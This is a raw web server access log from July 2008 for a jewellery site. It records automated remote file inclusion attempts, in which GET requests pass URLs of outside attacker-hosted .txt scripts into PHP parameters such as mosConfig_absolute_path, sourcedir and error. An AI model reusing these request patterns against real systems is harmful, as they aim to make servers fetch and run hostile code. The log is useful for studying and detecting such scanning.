201.130.79.130 - - [31/Jul/2008:02:26:56 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
90.3.115.62 - - [31/Jul/2008:02:26:58 -0700] "GET /logs/access.log//skin/zero_vote/404.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
60.250.73.179 - - [31/Jul/2008:02:27:36 -0700] "GET /logs/access.log/atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
60.250.73.179 - - [31/Jul/2008:02:27:42 -0700] "GET /atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
60.250.73.179 - - [31/Jul/2008:02:27:43 -0700] "GET /logs/atom.php5?page=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:28:48 -0700] "GET /logs/access.log//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:28:48 -0700] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:28:48 -0700] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
90.3.115.62 - - [31/Jul/2008:02:30:02 -0700] "GET /logs/access.log//skin/zero_vote/404.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
90.3.115.62 - - [31/Jul/2008:02:30:14 -0700] "GET //skin/zero_vote/404.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
90.3.115.62 - - [31/Jul/2008:02:30:20 -0700] "GET /logs//skin/zero_vote/404.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
153.19.161.46 - - [31/Jul/2008:02:30:53 -0700] "GET /logs/access.log/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
153.19.161.46 - - [31/Jul/2008:02:30:53 -0700] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
59.163.101.53 - - [31/Jul/2008:02:31:39 -0700] "GET /logs/access.log/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
59.163.101.53 - - [31/Jul/2008:02:31:53 -0700] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
90.3.115.62 - - [31/Jul/2008:02:32:32 -0700] "GET /logs/access.log//error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
90.3.115.62 - - [31/Jul/2008:02:32:45 -0700] "GET //error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
90.3.115.62 - - [31/Jul/2008:02:32:45 -0700] "GET /logs//error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.130.79.130 - - [31/Jul/2008:02:33:14 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.130 - - [31/Jul/2008:02:33:18 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:33:23 -0700] "GET /logs/access.log/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:33:23 -0700] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:33:23 -0700] "GET /logs/?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 1796 "-" "libwww-perl/5.811" "www.sojewels.com"
74.54.108.98 - - [31/Jul/2008:02:33:34 -0700] "GET /?sourcedir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:33:50 -0700] "GET /logs/access.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:33:50 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [31/Jul/2008:02:33:50 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.810" "www.sojewels.com"
77.221.130.16 - - [31/Jul/2008:02:33:58 -0700] "GET /logs/access.log/errors.php?error=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.soje